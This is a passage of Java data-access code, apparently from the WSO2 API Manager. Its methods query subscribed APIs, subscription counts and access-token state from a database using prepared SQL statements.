= APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { apiSet.add(new APIIdentifier(result.getString("API_PROVIDER"), result.getString("API_NAME"), result .getString("API_VERSION"))); } } catch (SQLException e) { handleException("Failed to get API ID for token: " + accessToken, e); } catch (CryptoException e) { handleException("Failed to get API ID for token: " + accessToken, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiSet; } /** * This method returns the set of APIs for given subscriber, subscribed under the specified application. * * @param subscriber subscriber * @param applicationName Application Name * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIs(Subscriber subscriber, String applicationName, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_SQL; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? 
))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIdArr[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setUUID(result.getString("SUB_UUID")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); application.setUUID(result.getString("APP_UUID")); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * This method returns the set of APIs for given subscriber, subscribed under the specified application. * * @param subscriber subscriber * @param applicationId Application Id * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIsByApplicationId(Subscriber subscriber, int applicationId, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_BY_ID_SQL; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? 
OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIdArr[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setUUID(result.getString("SUB_UUID")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); application.setId(result.getInt("APP_ID")); application.setOwner(result.getString("OWNER")); application.setCallbackUrl(result.getString("CALLBACK_URL")); application.setUUID(result.getString("APP_UUID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(application.getId())); } int subscriptionId = result.getInt("SUBS_ID"); Set<APIKey> apiKeys = getAPIKeysBySubscription(subscriptionId); for (APIKey key : apiKeys) { subscribedAPI.addKey(key); } subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); } } catch (SQLException e) { 
handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } private Set<APIKey> getAPIKeysBySubscription(int subscriptionId) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String getKeysSql = SQLConstants.GET_API_KEY_BY_SUBSCRIPTION_SQL; Set<APIKey> apiKeys = new HashSet<APIKey>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, subscriptionId); result = ps.executeQuery(); while (result.next()) { APIKey apiKey = new APIKey(); String decryptedAccessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); apiKey.setAccessToken(decryptedAccessToken); apiKey.setType(result.getString("TOKEN_TYPE")); apiKeys.add(apiKey); } } catch (SQLException e) { handleException("Failed to get API keys for subscription: " + subscriptionId, e); } catch (CryptoException e) { handleException("Failed to get API keys for subscription: " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } public Integer getSubscriptionCount(Subscriber subscriber, String applicationName, String groupingId) throws APIManagementException { Integer subscriptionCount = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriber.getName()); try { connection = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_CASE_INSENSITIVE_SQL; } String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR " + "((APP.GROUP_ID = '' OR APP.GROUP_ID IS NULL) AND SUB.USER_ID = ?)) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithUserId = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) 
"; String appIdentifier; boolean hasGrouping = false; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); sqlQuery += whereClauseWithMultiGroupId; String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); ps.setString(1, applicationName); ps.setInt(2, tenantId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { sqlQuery += whereClauseWithGroupId; ps = connection.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setInt(2, tenantId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClauseWithUserId; } ps = connection.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setInt(2, tenantId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { subscriptionCount = result.getInt("SUB_COUNT"); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptionCount; } public Integer getSubscriptionCountByApplicationId(Subscriber subscriber, int applicationId, String groupingId) throws APIManagementException { Integer subscriptionCount = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriber.getName()); try { connection = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_BY_APP_ID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_BY_APP_ID_CASE_INSENSITIVE_SQL; } String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR " + "((APP.GROUP_ID = '' OR APP.GROUP_ID IS NULL) AND SUB.USER_ID = ?)) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithUserId = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) 
"; String appIdentifier; boolean hasGrouping = false; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); sqlQuery += whereClauseWithMultiGroupId; String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); ps.setInt(1, applicationId); ps.setInt(2, tenantId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { sqlQuery += whereClauseWithGroupId; ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setInt(2, tenantId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClauseWithUserId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setInt(2, tenantId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { subscriptionCount = result.getInt("SUB_COUNT"); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptionCount; } /** * Gets the subscribed API's, by the group for the application. * * @param subscriber the subscriber subscribing for the api * @param applicationName the application to which the api's are subscribed * @param startSubIndex the start index for pagination * @param endSubIndex end index for pagination * @param groupingId the group id of the application * @return the set of subscribed API's. * @throws APIManagementException */ public Set<SubscribedAPI> getPaginatedSubscribedAPIs(Subscriber subscriber, String applicationName, int startSubIndex, int endSubIndex, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIBED_APIS_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseForceCaseInsensitiveComp = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) 
))"; try { connection = APIMgtDBUtil.getConnection(); int tenantId = APIUtil.getTenantId(subscriber.getName()); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String groupIDArray[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIDArray, 3); ps.setInt(1, tenantId); ps.setString(2, applicationName); // dynamically seeting the parameter index int paramIndex = groupIDArray.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseForceCaseInsensitiveComp; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); int index = 0; while (result.next()) { if (index >= startSubIndex && index < endSubIndex) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); if (index == endSubIndex - 1) { break; } } index++; } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * Gets the subscribed API's, by the group for the application. * * @param subscriber the subscriber subscribing for the api * @param applicationId the application to which the api's are subscribed * @param startSubIndex the start index for pagination * @param endSubIndex end index for pagination * @param groupingId the group id of the application * @return the set of subscribed API's. * @throws APIManagementException */ public Set<SubscribedAPI> getPaginatedSubscribedAPIs(Subscriber subscriber, int applicationId, int startSubIndex, int endSubIndex, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIBED_APIS_BY_APP_ID_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseForceCaseInsensitiveComp = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? 
OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); int tenantId = APIUtil.getTenantId(subscriber.getName()); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String groupIDArray[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIDArray, 3); ps.setInt(1, tenantId); ps.setInt(2, applicationId); // dynamically seeting the parameter index int paramIndex = groupIDArray.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseForceCaseInsensitiveComp; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); int index = 0; while (result.next()) { if (index >= startSubIndex && index < endSubIndex) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); if (index == endSubIndex - 1) { break; } } index++; } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * This method returns the set of APIs for given subscriber * * @param subscriber subscriber * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIs(Subscriber subscriber, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = 
null; //identify subscribeduser used email/ordinalusername String subscribedUserName = getLoginUserName(subscriber.getName()); subscriber.setName(subscribedUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_SUBSCRIBER_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ? " + "OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitiveComp = " AND ( (APP.APPLICATION_ID IN (SELECT " + "APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitiveComp; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 2); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); int paramIndex = groupIdArr.length + 1; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, groupingId); ps.setString(3, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, subscriber.getName()); } result = ps.executeQuery(); Map<String, Set<SubscribedAPI>> map = new TreeMap<String, Set<SubscribedAPI>>(); LRUCache<Integer, Application> applicationCache = new LRUCache<Integer, Application>(100); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); String tierName = result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID); subscribedAPI.setTier(new Tier(tierName)); subscribedAPI.setUUID(result.getString("SUB_UUID")); //setting NULL for subscriber. 
If needed, Subscriber object should be constructed & // passed in int applicationId = result.getInt("APP_ID"); Application application = applicationCache.get(applicationId); if (application == null) { application = new Application(result.getString("APP_NAME"), subscriber); application.setId(result.getInt("APP_ID")); application.setTokenType(result.getString("APP_TOKEN_TYPE")); application.setCallbackUrl(result.getString("CALLBACK_URL")); application.setUUID(result.getString("APP_UUID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(application.getId())); application.setOwner(result.getString("OWNER")); } applicationCache.put(applicationId, application); } subscribedAPI.setApplication(application); if (!map.containsKey(application.getName())) { map.put(application.getName(), new TreeSet<>(new Comparator<SubscribedAPI>() { public int compare(SubscribedAPI o1, SubscribedAPI o2) { int placement = o1.getApiId().getApiName().compareTo(o2.getApiId().getApiName()); if (placement == 0) { return new APIVersionComparator().compare(new API(o1.getApiId()), new API(o2.getApiId ())); } return placement; } })); } map.get(application.getName()).add(subscribedAPI); } for (Map.Entry<String, Set<SubscribedAPI>> entry : map.entrySet()) { subscribedAPIs.addAll(entry.getValue()); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } public boolean isAccessTokenExists(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.IS_ACCESS_TOKEN_EXISTS_PREFIX + accessTokenStoreTable + SQLConstants.IS_ACCESS_TOKEN_EXISTS_SUFFIX; boolean tokenExists = false; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { tokenExists = true; } } catch (SQLException e) { handleException("Failed to check availability of the access token. ", e); } catch (CryptoException e) { handleException("Failed to check availability of the access token. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenExists; } public boolean isAccessTokenRevoked(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.IS_ACCESS_TOKEN_REVOKED_PREFIX + accessTokenStoreTable + SQLConstants.IS_ACCESS_TOKE_REVOKED_SUFFIX; boolean tokenExists = false; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { if (!"REVOKED".equals(result.getString("TOKEN_STATE"))) { tokenExists = true; } } } catch (SQLException e) { handleException("Failed to check availability of the access token. 
", e); } catch (CryptoException e) { handleException("Failed to check availability of the access token. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenExists; } public APIKey getAccessTokenData(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; APIKey apiKey = new APIKey(); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.GET_ACCESS_TOKEN_DATA_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACCESS_TOKEN_DATA_SUFFIX; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); ps.setString(1, APIUtil.encryptToken(accessToken)); result = ps.executeQuery(); if (result.next()) { String decryptedAccessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); // todo - check String endUserName = 